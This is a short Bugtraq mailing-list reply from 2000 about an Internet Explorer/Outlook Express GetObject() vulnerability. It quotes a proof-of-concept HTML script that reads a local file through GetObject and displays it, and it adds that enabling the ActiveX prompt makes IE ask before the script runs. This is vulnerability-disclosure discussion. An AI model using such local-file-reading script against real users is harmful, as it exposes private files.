[16922] in bugtraq
Re: IE 5.5/Outlook Express security vulnerability - GetObject()
daemon@ATHENA.MIT.EDU (Fabrice Primel)
Wed Sep 27 12:33:40 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-Id: <200009271108.MAA25233@www.keskiya.fr>
Date: Wed, 27 Sep 2000 12:03:34 GMT
Reply-To: Fabrice Primel <fabrice@KESKIYA.FR>
From: Fabrice Primel <fabrice@KESKIYA.FR>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <39D0AC89.AB52DCBD@guninski.com>
Content-Transfer-Encoding: 8bit
>------getobject1.html--------------------------------
><SCRIPT>
>alert("This script reads C:\\TEST.TXT\nYou may need to create it");
>a=GetObject("c:\\test.txt","htmlfile");
>setTimeout("alert(a.body.innerText);",2000);
></SCRIPT>
>-----------------------------------------------------
Just a quick note : if you have configured explorer so that it asks
you before executing ActiveX, it will prompt you before executing the
above script.
Tested on IE5.0/Win2000.
Fabrice.
